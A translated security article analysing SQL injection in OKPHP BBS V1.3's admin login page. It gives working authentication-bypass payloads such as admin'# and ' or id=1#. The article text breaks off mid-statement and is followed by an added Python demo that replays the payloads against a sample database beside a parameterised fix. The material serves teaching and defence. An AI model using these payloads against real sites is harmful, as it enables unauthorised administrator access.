I. Foreword

Version information: OKPHP BBS V1.3. Open-source download address: http://www.cncode.com/softview.asp?softid=1800

Because of how PHP and MySQL themselves behave, injection against PHP + MySQL is harder than against ASP, especially when it comes to constructing the statements. This article is a simple analysis of a few files of OKPHP BBS V1.3 and, along the way, a discussion of how PHP/MySQL injection statements are put together. I hope it is of some help to you.

Disclaimer: none of the "vulnerabilities" mentioned in this article has been tested, and they may not exist at all. Whether a vulnerability really exists is not the important thing; what matters is the line of reasoning and the way the statements are constructed.

II. "Vulnerability" analysis

1. admin/login.php: injection that bypasses authentication

Code:

$conn = sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$usrname' and password='$password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);

In $q = "select id,group_id from $user_table where username='$usrname' and password='$password'", neither $usrname nor $password is filtered, so the check is easy to bypass. For a statement of the general form

select * from $user_table where username='$username' and password='$password'

the usual ways of transforming it are:

Construction 1 (logical operators):

$usrname = ' or 'a'='a
$password = ' or 'a'='a

which is equivalent to the SQL statement:

select * from $user_table where username='' or 'a'='a' and password='' or 'a'='a'

Construction 2 (MySQL comment syntax, # or /*, used to comment out the $password clause):

$usrname = admin'# (or admin'/*)

which gives:

select * from $user_table where username='admin'#' and password='$password'

and is equivalent to:

select * from $user_table where username='admin'

In admin/login.php, however, $password is passed through md5() before it is placed in $q, so construction 1 cannot bypass it: the attacker's quotes only ever land in the username clause, and because "and" binds tighter than "or", the statement becomes username='' or ('a'='a' and password='<md5 hash>'), which no row satisfies.

So here we use construction 2:

select id,group_id from $user_table where username='admin'#' and password='$password'

is equivalent to:

select id,group_id from $user_table where username='admin'

which succeeds as long as a user named admin exists. If you do not know the username but only know the corresponding id, you can construct:

$usrname = ' or id=1#

which gives:

select id,group_id from $user_table where username='' or id=1# and password='$password'

(everything from # onwards is commented out).

Continuing down through the code:

Code:

if ($row[0]) {
    // if not admin or super moderator
    // (the "|" alternation bars in the eregi() pattern are restored here;
    //  the source text shows the pattern garbled as "(^ &) 3 ($ &)")
    if ($usrname != "admin" && !eregi("(^|&)3($|&)", $row[1])) {
        $login = 0;
    } else {
        $login = 1;
    }
}
//--------------- fail to login ---------------
if (!$login) {
    write_log("Moderator Login", "0", "Password Wrong");
    echo "
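The following Python script is an added example and is not code from OKPHP BBS or from the original article. It rebuilds the $q statement from admin/login.php (password hashed with md5(), username concatenated unfiltered), shows what the three payloads above turn that statement into, runs them against a constructed sqlite3 table, and puts the string-built query next to a parameterised one, which is the fix. sqlite3 stands in for MySQL; because sqlite has no "#" comment, the helper mysql_effective() applies MySQL's comment rule to the statement text before it is executed. The table name okphp_user, the sample rows, the "&"-separated group_id format and the reading of group 3 as "super moderator" are assumptions made for the demo, as is the restored "(^|&)3($|&)" pattern.

```python
import hashlib
import re
import sqlite3

# Assumed layout for this demo (not taken from OKPHP BBS): $user_table is
# called okphp_user and group_id is a '&'-separated list of group numbers,
# with group 3 standing for "super moderator".
USER_TABLE = "okphp_user"


def php_md5(password):
    """PHP's md5(): the hex digest the login script stores and compares."""
    return hashlib.md5(password.encode()).hexdigest()


def build_login_query(usrname, password):
    """The statement admin/login.php builds: $password is hashed first,
    $usrname is dropped into the string unfiltered."""
    return ("SELECT id, group_id FROM %s WHERE username = '%s' AND password = '%s'"
            % (USER_TABLE, usrname, php_md5(password)))


def mysql_effective(sql):
    """What MySQL actually runs: a '#' outside a quoted string starts a comment
    that swallows the rest of the statement. Simplified: tracks single quotes
    only, no backslash escapes."""
    in_quote = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return sql[:i].rstrip()
    return sql


def passes_login_check(usrname, row):
    """The check that follows the query in admin/login.php: a returned row logs
    you in if $usrname is literally 'admin' or the row's group_id contains 3."""
    if not row:
        return False
    if usrname != "admin" and not re.search(r"(^|&)3($|&)", str(row[1]), re.I):
        return False
    return True


def make_db():
    """Constructed sample data; sqlite3 stands in for MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE %s (id INTEGER, username TEXT, password TEXT, group_id TEXT)"
                 % USER_TABLE)
    conn.executemany("INSERT INTO %s VALUES (?, ?, ?, ?)" % USER_TABLE, [
        (1, "admin", php_md5("s3cret"), "1&3"),   # admin, also in group 3
        (2, "mod", php_md5("modpass"), "2"),      # ordinary moderator, not group 3
    ])
    return conn


def vulnerable_login(conn, usrname, password):
    """String-built query, as in the original. mysql_effective() applies
    MySQL's '#' rule before the text reaches sqlite."""
    row = conn.execute(mysql_effective(build_login_query(usrname, password))).fetchone()
    return passes_login_check(usrname, row)


def safe_login(conn, usrname, password):
    """Same logic with bound parameters: the username can no longer close the
    quote or open a comment, so it is only ever compared as data."""
    row = conn.execute(
        "SELECT id, group_id FROM %s WHERE username = ? AND password = ?" % USER_TABLE,
        (usrname, php_md5(password)),
    ).fetchone()
    return passes_login_check(usrname, row)


if __name__ == "__main__":
    db = make_db()
    for payload in ["' or 'a'='a", "admin'#", "' or id=1 #", "' or id=2 #"]:
        print(repr(payload))
        print("  MySQL runs :", mysql_effective(build_login_query(payload, "wrong")))
        print("  vulnerable :", vulnerable_login(db, payload, "wrong"),
              "  parameterised:", safe_login(db, payload, "wrong"))
```

Running the script shows the three behaviours the analysis predicts: the logical-operator payload fails because the md5() hash leaves nothing attacker-controlled in the password clause; "admin'#" and "' or id=1 #" both return the admin row and pass the check only because that row's group_id contains 3; and "' or id=2 #" returns a row but is still rejected, since the second user is neither "admin" nor in group 3. With bound parameters every payload is compared literally and none logs in.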